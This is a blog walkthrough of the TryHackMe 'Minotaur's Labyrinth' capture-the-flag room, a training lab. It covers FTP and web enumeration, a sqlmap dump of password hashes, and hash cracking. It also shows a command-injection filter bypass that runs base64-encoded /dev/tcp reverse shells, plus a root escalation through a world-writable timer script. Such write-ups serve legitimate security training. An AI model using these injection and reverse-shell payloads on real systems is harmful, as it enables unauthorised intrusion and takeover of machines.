narancs's blog

TryHackMe – Minotaur’s Labyrinth walkthrough

Introduction

THM Minotaur's Labyrinth room logo

Minotaur’s Labyrinth is a medium difficulty room on TryHackMe. We need to find 4 flags. The first 2 flags can be found by enumeration. Then we also find a way to get access to the target machine to obtain the user and root flags.

Enumeration

Note: I have added the IP address of the VM to /etc/hosts as labyrinth.thm, so I don’t have to use the IP

Nmap scan results:

Nmap found 4 open ports:

  • FTP is running on port 21. We can also see that Anonymous FTP login is allowed.
  • Apache webserver is running on port 80 (HTTP) and port 443 (HTTPS).
  • MariaDB server is running on port 3306, but connection is not allowed.

Enumerating FTP

We can login to FTP with anonymous user, password is not required.

We can find 3 files on the FTP server.

  • flag.txt contains the first flag
  • Content of message.txt:
    • Daedalus is a clumsy person, he forgets a lot of things arount the labyrinth, have a look around, maybe you’ll find something 🙂
      — Minotaur
  • Content of keep_in_mind.txt
    • Not to forget, he forgets a lot of stuff, that’s why he likes to keep things on a timer … literally
      — Minotaur

After that I moved on to enumerate the website.

Enumerating the website

I visited the website running on port 80.

It is a login page where we have 2 other options besides logging in:

  • Forgot password?: shows a popup with follow message:
    • Ye …. Thought it would be this easy?
  • Click here for root flag: redirects to /jebait.html

As none of these options were helpful, I also tried basic SQL injection on the login form. That did not work either, so then I used gobuster to enumerate additional files / directories.

When I tried to run gobuster first, I received an error:

				
					Error: the server returns a status code that matches the provided options for non existing urls. http://labyrinth.thm/05f2ae4b-982c-4bbd-ad0a-ac4ced6f54eb => 302 (Length: 3562). To continue please exclude the status code, the length or use the --wildcard switch
				
			

I excluded the status code 302, and then it worked fine:

				
					gobuster dir --url http://labyrinth.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 32 -b 302
				
			

I found an interesting file in /js directory: login.js. It contained a pwdgen() funtion and a comment that showed how to get the password for Daedalus user!

				
					function pwdgen() {
    a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
    b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
    c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
}
//pwd gen for Daedalus a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8]
				
			

We can run the following 4 lines of code in the console to quickly get the password for Daedalus user:

				
					a = ["0", "h", "?", "1", "v", "4", "r", "l", "0", "g"]
b = ["m", "w", "7", "j", "1", "e", "8", "l", "r", "a", "2"]
c = ["c", "k", "h", "p", "q", "9", "w", "v", "5", "p", "4"]
a[9]+b[10]+b[5]+c[8]+c[8]+c[1]+a[1]+a[5]+c[0]+c[1]+c[8]+b[8]
				
			
Password for Daedalus is g2e55kh4ck5r. I checked the other directories and noticed that these credentials can be found in /logs/post/post_log.log as well. It is a POST request sent to /minotaur/minotaur-box/login.php containing the credentials email=Daedalus&password=g2e55kh4ck5r.

With this information we can login at /login.html.

Exploitation

Finding the administrator's password and the second flag

There is an input field on the page, where we can search for People or Creatures. If we check the source code of the page, we can see a comment above the input:

				
					<!-- Minotaur!!! Told you not to keep permissions in the same shelf as all the others especially if the permission is equal to admin -->
				
			

I searched for Daedalus user in the People table and the result showed the password hash of the user. Then I tried to find the password hash of the administrator user by search for ‘Admin’, ‘Administrator’, ‘Minotaur’, etc., but I could not find any results.

After that I tried SQL injection in the input field. I used Burp Suite to capture a search request and then saved the request to a file called search.req.

Then I used sqlmap to dump the contents of the database.

				
					sqlmap -r search.req --dump 
				
			

The results:

				
					Table: people
[5 entries]
+----------+--------------+----------------------------------+------------------+
| idPeople | namePeople   | passwordPeople                   | permissionPeople |
+----------+--------------+----------------------------------+------------------+
| 1        | Eurycliedes  | 42354020b68c7ed28dcdeabd5a2baf8e | user             |
| 2        | Menekrates   | 0b3bebe266a81fbfaa79db1604c4e67f | user             |
| 3        | Philostratos | b83f966a6f5a9cff9c6e1c52b0aa635b | user             |
| 4        | Daedalus     | b8e4c23686a3a12476ad7779e35f5eb6 | user             |
| 5        | M!n0taur     | 1765db9457f496a39859209ee81fbda4 | admin            |
+----------+--------------+----------------------------------+------------------+
Table: creatures
[4 entries]
+------------+--------------+----------------------------------+--------------------+
| idCreature | nameCreature | passwordCreature                 | permissionCreature |
+------------+--------------+----------------------------------+--------------------+
| 1          | Cerberos     | 3898e56bf6fa6ddfc3c0977c514a65a8 | user               |
| 2          | Pegasus      | 5d20441c392b68c61592b2159990abfe | user               |
| 3          | Chiron       | f847149233ae29ec0e1fcf052930c044 | user               |
| 4          | Centaurus    | ea5540126c33fe653bf56e7a686b1770 | user               |
+------------+--------------+----------------------------------+--------------------+
				
			

We can see that the user M!n0taur has admin permissions and we also see the password hash of the user. I cracked the password with hashcat:

				
					hashcat -a 0 -m 0 1765db9457f496a39859209ee81fbda4 /usr/share/wordlists/rockyou.txt --quiet
				
			

Now we can login with M!n0taur user and with the password we found. We will have access to 2 other menu points on the page. One of them contains the second flag.

Finding the user flag

The other menu point that we have access to is called ‘Secret_Stuff’. It redirects us to /echo.php page which shows an ‘echo-pannel’.

If we type ‘test’ into the input, it will show up twice on the page. I thought it is probably running the echo command in the background and shows the results on the page. So I started experimenting how to chain other commands after the echo. I realized that some special characters (e.g. ; &) are disallowed. However, the | character works, so if I type

				
					| ls -l
				
			

I get an output:

				
					total 68
drwxr-xr-x 4 root root 4096 jún   20  2021 api
drwxr-xr-x 2 root root 4096 jún   20  2021 css
-rw-r--r-- 1 root root  322 jún   20  2021 dbConnect.php
-rw-r--r-- 1 root root 2739 okt   11  2021 echo.php
-rw-r--r-- 1 root root 1369 jún   20  2021 favicon.png
drwxr-xr-x 2 root root 4096 jún   20  2021 imgs
-rw-r--r-- 1 root root 4571 jún   20  2021 index.php
-rw-r--r-- 1 root root 1340 jún   20  2021 jebait.html
drwxr-xr-x 2 root root 4096 jún   20  2021 js
-rw-r--r-- 1 root root 2485 jún   20  2021 login.html
-rw-r--r-- 1 root root  865 jún   20  2021 login.php
-rw-r--r-- 1 root root   84 jún   20  2021 logout.php
drwxr-xr-x 3 root root 4096 okt   11  2021 logs
-rw-r--r-- 1 root root   20 jún   20  2021 README.md
-rw-r--r-- 1 root root  333 jún   20  2021 session2.php
-rw-r--r-- 1 root root  282 jún   20  2021 session.php
				
			

We can also read the files with the cat command, and then figure out which characters are disallowed by the code in echo.php file. From this point we can run a reverse shell on the target machine. We need to encode the reverse shell payload as base64 string, then we pipe it into base64 -d command, finally into the bash command to execute it.

Reverse shell payload (I added in some extra space characters, so the base64 encoded string does not contain = character for padding, because it is not allowed):

				
					/bin/bash -l > /dev/tcp/10.11.56.129/1234 0<&1   2>&1
				
			

Base64 encoded:

				
					L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTEuNTYuMTI5LzEyMzQgMDwmMSAgIDI+JjEK
				
			

Final command to run in the echo-panel:

				
					L2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTEuNTYuMTI5LzEyMzQgMDwmMSAgIDI+JjEK | base64 -d | bash
				
			

We received a shell as daemon user. The user flag is in /home/user/flag.txt.

Finding the root flag

I found 2 interesting directories in /: /reminders and /timers. If we check /timers directory, we can find a script that has 777 permissions called timers.sh:

				
					#!/bin/bash
echo "dont fo...forge...ttt" >> /reminders/dontforget.txt
				
			

Based on the length of dontforget.txt this script is executed very frequently. We can easily append a reverse shell to timers.sh, wait for it to be executed and receive a shell as root.

				
					echo -n '/bin/bash -l > /dev/tcp/10.11.56.129/4444 0<&1 2>&1' >> /timers/timer.sh
				
			
Once we received the root shell, we can find the flag in /root/da_king_flek.txt file.

Table of Contents

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related posts

0
Would love your thoughts, please comment.x
()
x